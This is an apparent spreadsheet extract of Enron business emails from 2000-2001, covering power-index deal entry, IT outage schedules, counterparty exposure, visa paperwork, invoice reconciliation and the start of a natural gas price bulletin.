the Dow Jones Mid-Columbia index, but none called specifically "Mid-C Firm _x000D_
Peak." We have non-firm peak, and something called "Mid-Columbia Index." _x000D_
_x000D_
I'm just wondering how to specify that I want the deal to settle against the _x000D_
Dow Jones Mid-C PEAK index. In this case, because I was entering a _x000D_
round-the-clock (all hours, all days) deal, I had to enter three different _x000D_
deals to specify the three different indices - Mid-C Peak, Mid-C Off Peak, _x000D_
and Mid-C Sundays and Holidays. But I don't see a Mid-C Peak choice, so I _x000D_
entered the first as Mid-C Index._x000D_
_x000D_
Deal numbers are:_x000D_
597244 - Peak_x000D_
597245 - Off Peak_x000D_
597246 - Sundays/Holidays_x000D_
_x000D_
I just wanted to ask because when you guys plug the index prices in here I _x000D_
want to make sure that "Mid-C Index" gets the peak price. Could you let me _x000D_
know if it doesn't? And if that's the case, then I'll need to have another _x000D_
pub code set up for peak price._x000D_
_x000D_
Thanks for your help on this. Please let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
503-464-7486</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 14:40:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 10-19-01 through 10-21-01</t>
  </si>
  <si>
    <t>_x000D_
------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
October 19, 2001 5:00pm through October 22, 2001 12:00am_x000D_
------------------------------------------------------------------------------------------------------_x000D_
		    		    		    				    		    		    				    			    		    		_x000D_
SCHEDULED SYSTEM OUTAGES: _x000D_
_x000D_
ECS power outage_x000D_
_x000D_
A power outage will occur in Enron Center South on Saturday, October 20, 2001 to complete repairs to the electrical riser system required to correct issues resulting from Tropical Storm Allison._x000D_
_x000D_
IDF's and thus network resident applications and data will be off line on all ECS floors 3 through 6 from 10:00 a.m. Saturday until 8:00 a.m. Sunday._x000D_
_x000D_
Trading floors 3, 4, 5 and 6 desktop power will be off beginning 2:00 p.m. Saturday until 12:00 noon Sunday._x000D_
_x000D_
Avaya telephony phone system will be unaffected.  However, the turret system will be offline starting 11:00 a.m. Saturday until 1:00 p.m. Sunday._x000D_
_x000D_
Additionally, during this power outage the cooling system will be upgraded.  This upgrade may take up to 2 hours.  Occupants in the building may experience as much as a five degree rise in temperature._x000D_
 _x000D_
Contacts: Stuart Fieldhouse  713-853-5699  _x000D_
	     Lance Jameson       713-345-4423  _x000D_
 _x000D_
ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
AZURIX: No Scheduled Outages._x000D_
_x000D_
EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
EDI SERVER: No Scheduled Outages._x000D_
 _x000D_
EES: _x000D_
Impact:  EES	_x000D_
Outage:  EESHOU-DBPCCS - Sat 8-10am CT_x000D_
EESTEST-DBPCCS - Sun 9:30-11:30 am CT_x000D_
EESTEST-WBPCCS - Sun 10am-12pm CT_x000D_
EESHOU-EEIS - Fri 6-8pm CT_x000D_
EESHOU-WBPCCS - Sun 8:30-10:35am CT_x000D_
EESHOU-DBRPS3 - Sat 9-10am CT_x000D_
EESHOU-OMS01 - Fri 5:30-7:30pm CT_x000D_
Environments Impacted:  EES_x000D_
Purpose: Install monitoring tools._x000D_
Backout: Uninstall_x000D_
Contact(s): 	David DeVoll        713-345-8970_x000D_
		Animesh Solanki  713-853-5147_x000D_
   _x000D_
ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:   ALSO SEE ORIGINAL REPORT_x000D_
Impact:  ECN 46_x000D_
Time:  Sat 10/20/2001 at  9:00:00 AM CT thru Sat 10/20/2001 at  4:00:00 PM CT_x000D_
	Sat 10/20/2001 at  7:00:00 AM PT thru Sat 10/20/2001 at  2:00:00 PM PT_x000D_
	Sat 10/20/2001 at  3:00:00 PM London thru Sat 10/20/2001 at  10:00:00 PM London_x000D_
Outage:  Telecom Closet Clean Up ECN 46_x000D_
Environments Impacted:  ECN 46_x000D_
Purpose: IDF and port management_x000D_
Backout: _x000D_
Contact(s): 	Mark Trevino    713-345-9954  _x000D_
 _x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
 _x000D_
HR:          SEE ORIGINAL REPORT_x000D_
 _x000D_
MESSAGING:      SEE ORIGINAL REPORT_x000D_
  _x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS:     ALSO SEE ORIGINAL REPORT_x000D_
Impact:  nahou-wwirf01t nahou-wwirf01d nahou-wwjrn01d nahou-wwjrn01tnahou-wwiwn01d_x000D_
Time:  Thu 10/18/2001 at  5:00:00 PM CT thru Fri 10/19/2001 at  7:00:00 PM CT_x000D_
	Thu 10/18/2001 at  3:00:00 PM PT thru Fri 10/19/2001 at  5:00:00 PM PT_x000D_
	Thu 10/18/2001 at  11:00:00 PM London thru Sat 10/20/2001 at  1:00:00 AM London_x000D_
Outage:  SP2   Hotfix 301625   WINS-DNS update_x000D_
Environments Impacted:  Developers and Testers of the server listed below_x000D_
Purpose: This is our new standard for ALL Web and App servers in our group._x000D_
Backout: Rollback SP2 Hot Fix and put old WINS and DNS entries back _x000D_
Contact(s): 	Clint Tate    713-345-4256  _x000D_
_x000D_
Impact:  CORP_x000D_
Time:  Sun 10/21/2001 at  6:00:00 AM CT thru Sun 10/21/2001 at  6:00:00 PM CT_x000D_
	Sun 10/21/2001 at  4:00:00 AM PT thru Sun 10/21/2001 at  4:00:00 PM PT_x000D_
	Sun 10/21/2001 at  12:00:00 PM London thru Mon 10/22/2001 at 12:00:00 AM London_x000D_
Outage:  RMSPROD table/index reorg_x000D_
Environments Impacted:  Corp_x000D_
Purpose:  reduce fragmentation and increase performance._x000D_
Backout: Disable restricted session._x000D_
Contact(s): 	Emmett Cleveland    713-345-3873 _x000D_
_x000D_
SITARA:  _x000D_
Impact:  Production_x000D_
Time:  Sat 10/20/2001 at  7:00:00 PM CT thru Sun 10/21/2001 at  7:00:00 AM CT_x000D_
	Sat 10/20/2001 at  5:00:00 PM PT thru Sun 10/21/2001 at  5:00:00 AM PT_x000D_
	Sun 10/21/2001 at  1:00:00 AM London thru Sun 10/21/2001 at  1:00:00 PM London_x000D_
Outage:  New Hardware - Trinity_x000D_
Environments Impacted:  Corp_x000D_
Purpose: Improve Sitara performance with Hardware enhancement._x000D_
Backout: revert to Madrid as primary._x000D_
Contact(s): 	SitaraonCall    713-288-0101 _x000D_
 _x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY:      SEE OIGINAL REPORT_x000D_
 _x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  No Scheduled Outages._x000D_
 _x000D_
SCHEDULED SYSTEM OUTAGES: LONDON _x000D_
Impact:  CORP_x000D_
Time:  Fri 10/19/2001 at  6:00:00 PM CT thru Sat 10/20/2001 at  9:00:00 PM CT_x000D_
	Fri 10/19/2001 at  4:00:00 PM PT thru Sat 10/20/2001 at  7:00:00 PM PT_x000D_
	Sat 10/20/2001 at  12:00:00 AM London thru Sun 10/21/2001 at  3:00:00 AM London_x000D_
Outage:  Complete Powerdown of the London Office_x000D_
Environments Impacted:  All_x000D_
Purpose: To complete the final works and testing to install a third generator in Enron House_x000D_
Backout: Switch all equipment back on once power has been restored._x000D_
Contact(s): 	Tracy Pearson   830-34238 London Tie Line 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Mon, 17 Dec 2001 11:01:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'caroline.abramo@enron.com'})</t>
  </si>
  <si>
    <t>counterparty processes</t>
  </si>
  <si>
    <t>Sara- I am sorry to hear Frank has left.. have you spoken to him, is he OK? How are you doing?_x000D_
_x000D_
Can you please tell me how you are dealing with counterparties who still have exposure to Enron?_x000D_
_x000D_
I know all contracts are null and void.. what is the process for them to take off deals._x000D_
_x000D_
The only counterparties I have with any exposure are:_x000D_
tudor_x000D_
wexford_x000D_
_x000D_
I am asking for them specifically._x000D_
_x000D_
Also, on monies we owe counterparties.. like tudor and catequil, what is the process they must go through?_x000D_
_x000D_
Thanks very much,_x000D_
Caroline_x000D_
_x000D_
cell- 917 324 1999_x000D_
home- 212 737 2082</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 06:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mr. LARRY CAMPBELL:_x000D_
_x000D_
Thank you for your order._x000D_
_x000D_
You bought 100 shares of JNPR (Juniper Networks Inc Com) at 136 7/16._x000D_
_x000D_
ORDER DETAILS:_x000D_
The tracking number for this order is: B-300-AAZO-4506_x000D_
Order entered at:                      09:08:51 on 12/05/00_x000D_
Order processing began at:             09:08:51_x000D_
Order executed at:                     09:08:52 on 12/05/00_x000D_
_x000D_
ACCOUNT DETAILS:_x000D_
Time and Date: 09:08:52 on 12/05/00_x000D_
Your position in JNPR is 230 shares_x000D_
Your real cash total is $-11,846.67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Mon, 16 Oct 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sean.boyle@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'dick.jenkins@enron.com', 'ed.mcmichael@enron.com', 'scott.neal@enron.com', 'steve.gillespie@enron.com', 'scott.hendrickson@enron.com', 'chris.germany@enron.com', 'mark.breese@enron.com'})</t>
  </si>
  <si>
    <t>Cove Point LNG</t>
  </si>
  <si>
    <t>Following up from my earlier e-mail regarding the primary receipt capacity on _x000D_
the CNG FT contract associated with the Cove Point gas;_x000D_
CNG has indicated that on a peak day they would restrict  the PL1 system to _x000D_
primary receipts and deliveries consequently eliminating the WGL redelivery _x000D_
option that VNG has utilised in the past several years to deliver the Cove _x000D_
Point gas via CNG.  I called Williams to ask if the Cove Point gas that ENA _x000D_
has this winter could deliver into CNG, the answer was clearly not until _x000D_
April 2002 due to a pressure problem on the Cove Point side.  _x000D_
I think the emphasis should shift to AGL to pressure TRANSCO to fulfil their _x000D_
contractual arrangement or at least provide a financial settlement._x000D_
Let me know if I can help in any way.</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 07:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jdixon@calpine.com'})</t>
  </si>
  <si>
    <t>frozenset({'joego@calpine.com', 'gerald.nemec@enron.com', 'jdixon@calpine.com', 'bradb@calpine.com'})</t>
  </si>
  <si>
    <t>RE: Doc's for conference call</t>
  </si>
  <si>
    <t>Here are the changes to the Enfolio that Michael and I came up with.  Please_x000D_
review and let me know if you have any comments._x000D_
I spoke with Michael and the document that Reed of PGT mentioned was with_x000D_
Michael is actually the surety bond that Michael has sent to the insurance_x000D_
company for final execution.  If you have any credit questions, please call_x000D_
Michael at 650-303-0274 (cell)._x000D_
_x000D_
-----Original Message-----_x000D_
From: Gerald.Nemec@enron.com [mailto:Gerald.Nemec@enron.com]_x000D_
Sent: Thursday, December 28, 2000 3:28 PM_x000D_
To: bradb@calpine.com; joego@calpine.com; jdixon@calpine.com_x000D_
Cc: Stephanie.Miller@enron.com_x000D_
Subject: Doc's for conference call_x000D_
_x000D_
_x000D_
Attached is latest version - due to quick turnaround, there may be a few_x000D_
typo's._x000D_
_x000D_
Julie, Gerald and I will be present. Talk to you then...._x000D_
_x000D_
(See attached file: CALPINE CONFIRM5RED.DOC)(See attached file:_x000D_
CalpineAssignRelease6(red).doc)(See attached file: CALPINE CORPORATION.doc)_x000D_
_x000D_
_x000D_
 - Enron CALPINE CORPORATION redline Enfolio 12-29-00.doc_x000D_
 - Enron CALPINE CORPORATION CLEAN Enfolio 12-29-00.doc</t>
  </si>
  <si>
    <t>Mon, 13 Aug 2001 14:59:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>HELP</t>
  </si>
  <si>
    <t>Ina,_x000D_
_x000D_
I keep getting this invoicing message, could you run me through getting this resolved._x000D_
_x000D_
Thanks, _x000D_
Susan_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	&lt;iBuyit.Payables@Enron.com&gt;@ENRON [mailto:IMCEANOTES-+3CiBuyit+2EPayables+40Enron+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, August 13, 2001 12:07 AM_x000D_
To:	sscott5@enron.com_x000D_
Subject:	Action Requested:  Past Due Invoice_x000D_
_x000D_
Please do not reply to this e-mail._x000D_
_x000D_
You are receiving this message because you have an unresolved invoice in your iBuyit Payables in-box_x000D_
that is past due.  Please login to iBuyit Payables and resolve this invoice as soon as possible._x000D_
_x000D_
To launch iBuyit Payables, click on the link below:_x000D_
http://iBuyitPayables.enron.com_x000D_
Note:  Your iBuyit Payables User ID and Password are your eHRonline/SAP Personnel ID and Password._x000D_
_x000D_
First time iBuyit Payables user?  For training materials, click on the link below:_x000D_
http://sap.enron.com/sap_doclib/user/file_list.asp?cabinet_id=265_x000D_
_x000D_
Need help?_x000D_
Please contact the ISC Call Center at (713) 345-4727._x000D_
_x000D_
If you are in Europe, please contact European Accounts Payable at +44 20 7783 7520.</t>
  </si>
  <si>
    <t>Mon, 14 Feb 2000 01:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dan garbez</t>
  </si>
  <si>
    <t xml:space="preserve">TWanda, we need an amendment to this agreement.  Would you please do the _x000D_
form?  Thanks.  Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 02/14/2000 09:09 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital Management_x000D_
	_x000D_
	From:  Robert Greer                           02/11/2000 10:31 AM_x000D_
	_x000D_
_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Dan garbez_x000D_
_x000D_
Michelle,_x000D_
_x000D_
The consultant we were talking about this morning is Dan Garbez.  We signed a _x000D_
6 month consulting agreement with him about 8 or 9  months ago._x000D_
_x000D_
Let me know if you have further questions._x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 09:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Catalytica</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/14/2000 _x000D_
05:24 PM ---------------------------_x000D_
_x000D_
_x000D_
Richard Lydecker@ENRON_x000D_
12/14/2000 03:19 PM_x000D_
To: David W Delainey/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT_x000D_
cc: Jeff Donahue/HOU/ECT@ECT, Ray Bowen, Andrea V Reed/HOU/ECT@ECT _x000D_
Subject: Catalytica_x000D_
_x000D_
Catalytica Energy Systems Inc. commenced trading today:_x000D_
_x000D_
_x000D_
    Open     9 1/8_x000D_
    High   13 1/4_x000D_
    Low     9 1/8_x000D_
    Close   13 1/8_x000D_
_x000D_
At 13 1/8, Enron's investment is valued at $17.6 million._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 03:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: L1 Visa - Anshuman Shrivastava</t>
  </si>
  <si>
    <t xml:space="preserve">Molly,_x000D_
_x000D_
Thanks for the update. Two points._x000D_
_x000D_
Please, let Neil McGregor know that many possible proposals were floated_x000D_
with regard to Anshuman and there was some noise in the system._x000D_
We need L1 visa anyway and we decided to go ahead an arrange it._x000D_
I shall also write to him and explain the confusion._x000D_
_x000D_
Also, if I have the choice between upsetting Neil or Jeffs (Shankman and _x000D_
Skilling),_x000D_
I shall choose Neil._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Molly Magee                           01/24/2001 10:13 AM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: L1 Visa - Anshuman Shrivastava_x000D_
_x000D_
Vince:  Apparently Neil McGregor became upset when he received Margaret _x000D_
Daffin's email.    He is saying, however, that Anshuman will only be in _x000D_
Houston for one month, and you had mentioned six months when we spoke _x000D_
earlier.   It really doesn't make any difference since he will need to get an _x000D_
L1 visa under either circumstance, but I thought you might want to see his _x000D_
email._x000D_
_x000D_
Molly_x000D_
---------------------- Forwarded by Molly Magee/HOU/ECT on 01/24/2001 10:09 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Margaret Daffin_x000D_
01/24/2001 09:57 AM_x000D_
To: Molly Magee/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: L1 Visa - Anshuman Shrivastava_x000D_
_x000D_
Molly:  per our conversation today.  Please let me know the status so that I _x000D_
can proceed with the visa process._x000D_
Thanks_x000D_
Margaret_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Margaret Daffin/HOU/ECT on 01/24/2001 _x000D_
09:56 AM ---------------------------_x000D_
_x000D_
_x000D_
Neil McGregor@ENRON_DEVELOPMENT_x000D_
01/24/2001 05:18 AM_x000D_
To: Margaret Daffin/HOU/ECT@ECT_x000D_
cc: Wade Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Re: L1 Visa - Anshuman Shrivastava  _x000D_
_x000D_
Anshuman is not moving or immigrating to the US. We are allowing him to work _x000D_
for a 1month assignment in the US with Enron. Please carry out the necessary _x000D_
approvals and visa's on this basis._x000D_
Neil McGregor _x000D_
CEO Dabhol Power_x000D_
_x000D_
_x000D_
_x000D_
Margaret Daffin@ECT_x000D_
01/23/2001 10:31 PM_x000D_
To: anshuman.srivastav@enron.com_x000D_
cc: Molly Magee/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Jane _x000D_
Allen/HOU/ECT@ECT, Timothy Callahan/NA/Enron@Enron, Ranendra _x000D_
Sengupta/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Wade _x000D_
Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Neil _x000D_
McGregor/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ECT, Harsimran _x000D_
Singh/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: L1 Visa - Anshuman Shrivastava_x000D_
_x000D_
Anshuman:  I have been asked to contact you regarding your possible move to _x000D_
Houston, Texas.  In order that I may begin the process of getting you an L1 _x000D_
immigration visa, I will need you to complete the attached visa questionnaire _x000D_
and return it to me with copies of the following documents:_x000D_
_x000D_
a copy of all pages of your passport, even if blank_x000D_
copies of all previous US visas issued_x000D_
an updated resume, showing months and years_x000D_
copies of all Diplomas and transcripts received_x000D_
if you have dependent family members coming to the States with you, copies of _x000D_
their passports_x000D_
_x000D_
Please send to my attention, via Fedex to:_x000D_
_x000D_
Enron Corp._x000D_
3 Allen Center, 3AC2026A_x000D_
333 Clay Street_x000D_
Houston, TX 77002_x000D_
_x000D_
Please call me with any questions you may have at 713-345-5083._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 10:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kyle.etter@enron.com', 'dick.jenkins@enron.com'})</t>
  </si>
  <si>
    <t>Re: CES Update</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 08/14/2000 05:07 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Scott Neal_x000D_
08/14/2000 05:05 PM_x000D_
To: William Kelly/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CES Update_x000D_
_x000D_
fyi._x000D_
_x000D_
Please follow up to make sure these $ are going to the correct p&amp;l._x000D_
_x000D_
---------------------- Forwarded by Scott Neal/HOU/ECT on 08/14/2000 05:02 PM _x000D_
---------------------------_x000D_
From: Molly Sumrow on 08/14/2000 04:35 PM_x000D_
To: Robert Superty/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CES Update  _x000D_
_x000D_
The first invoice for $5.4 million went out a couple of weeks ago.  CES came _x000D_
back to us and said they were not going to pay.  They claimed that the total _x000D_
of all of the invoices to this date that they have already paid had covered _x000D_
that amount.  I have researched all of their invoices, and it looks like _x000D_
there was a demand invoice in the system for the month of June for _x000D_
approximately $6 million to much.  CES incorporated a credit for that invoice _x000D_
in with the charge for $5.4 million, netting out to approximately $600,000.  _x000D_
I am meeting with CES on Thursday to see if we are in agreement.  The other _x000D_
invoice for $7.5 million was sent out last week, CES is in agreement and the _x000D_
payment should be here shortly._x000D_
   If you have any questions don't hesitate to call me._x000D_
_x000D_
Molly _x000D_
x34249_x000D_
_x000D_
_x000D_
_x000D_
Robert Superty_x000D_
08/14/2000 04:06 PM_x000D_
To: Molly Sumrow/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CES Update_x000D_
_x000D_
Molly, please see Scott's note below and give us an update._x000D_
_x000D_
Thanks - Bob_x000D_
---------------------- Forwarded by Robert Superty/HOU/ECT on 08/14/2000 _x000D_
04:01 PM ---------------------------_x000D_
_x000D_
_x000D_
Scott Neal_x000D_
08/14/2000 03:18 PM_x000D_
To: Robert Superty/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CES Update  _x000D_
_x000D_
What is the status of these invoices/payments?_x000D_
_x000D_
_x000D_
_x000D_
Robert Superty_x000D_
08/03/2000 04:02 PM_x000D_
To: Sally Beck/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Brent A _x000D_
Price/HOU/ECT@ECT, Bryce Baxter/HOU/ECT@ECT_x000D_
cc: Molly Sumrow/HOU/ECT@ECT _x000D_
Subject: CES Update_x000D_
_x000D_
FYI - ongoing CES reconciliation. At this point we will be receiving app. _x000D_
$5.4M (invoice sent on 7/27) with another $7.5M to be billed to them next _x000D_
week._x000D_
_x000D_
Still more to come, for details read the attached from Molly._x000D_
_x000D_
Bob _x000D_
---------------------- Forwarded by Robert Superty/HOU/ECT on 08/03/2000 _x000D_
03:52 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Molly Sumrow                           08/03/2000 03:47 PM_x000D_
	_x000D_
_x000D_
To: Robert Superty/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT, Beverly _x000D_
Beaty/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CES Update_x000D_
_x000D_
Attached is the current status of the CES reconciliation.  Please call me if _x000D_
you have any questions._x000D_
_x000D_
_x000D_
_x000D_
Thank You,_x000D_
_x000D_
Molly_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 04:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'debbie.brackett@enron.com', 'sara.shackleton@enron.com', 'william.bradford@enron.com'})</t>
  </si>
  <si>
    <t>Market Axess</t>
  </si>
  <si>
    <t xml:space="preserve">As a result of restrictions that Market Axess has imposed on users of its _x000D_
multi-dealer online bond trading site, we will not begin using the site until _x000D_
trading of high yield bonds is implemented late this year.  _x000D_
_x000D_
Legal:  I suggest that we defer legal discussions until this date _x000D_
approaches.  _x000D_
_x000D_
Credit Approval:   This will not be an anonymous site, where our credit _x000D_
exposure is to the site or clearing broker.  Our exposure for Market Axess _x000D_
transactions will be to one of their participating dealers.  My understanding _x000D_
is that we have trading agreements with each of Market Axess' current dealers _x000D_
(JP Morgan, Chase, Bear Stearns, ABN Amro, Deutsche, UBS Warburg).  Please _x000D_
let me know if there are credit issues related to trading with these dealers _x000D_
through Market Axess.  Before we begin trading, we will determine if there _x000D_
are any new Market Axess dealers for whom credit approval is required._x000D_
_x000D_
Please let me know if you like to discuss._x000D_
_x000D_
Thanks._x000D_
_x000D_
Mike_x000D_
x39990_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 11:35:30 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _x000D_
&lt;HTML&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      _x000D_
&lt;TITLE&gt;Gas Indices - IntercontentalExchange&lt;/TITLE&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
&lt;BODY&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      _x000D_
&lt;P&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
&lt;P ALIGN=CENTER&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _x000D_
&lt;FONT SIZE=+1&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              _x000D_
&lt;B&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
IntercontinentalExchange                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;/B&gt;&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;/FONT&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
Firm Physical Natural Gas Price Bulletin                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
_x000D_
&lt;BR&gt;&lt;B&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
For Natural Gas Delivered on Tuesday, November  27, 2001                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;/B&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;FONT SIZE=-1&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              _x000D_
&lt;I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
(Trade Date of Monday, November  26, 2001)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  _x000D_
&lt;/I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;/FONT&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;BR&gt;&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
Click here to access &lt;A HREF="http://www.intcx.com/SubscriberServlet/subscriberservlet.class?operation=gasIndexForm&amp;hub=All"&gt;index history&lt;/A&gt;.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
_x000D_
&lt;FONT SIZE=-1&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              _x000D_
&lt;I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
* volume represents sell-side only *                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;/I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;/FONT&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;/P&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TABLE ALIGN="CENTER" WIDTH="100%"  cellspacing="8"&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TH align=left valign=bottom width="15%"&gt; &lt;FONT size=-1&gt;&lt;U&gt;&lt;I&gt;Region&lt;/I&gt;&lt;/U&gt;&lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;U&gt;Hub&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;&lt;TH align=right valign=bottom width="6%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;High&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                _x000D_
&lt;TH align=right valign=bottom width="6%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Low&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               _x000D_
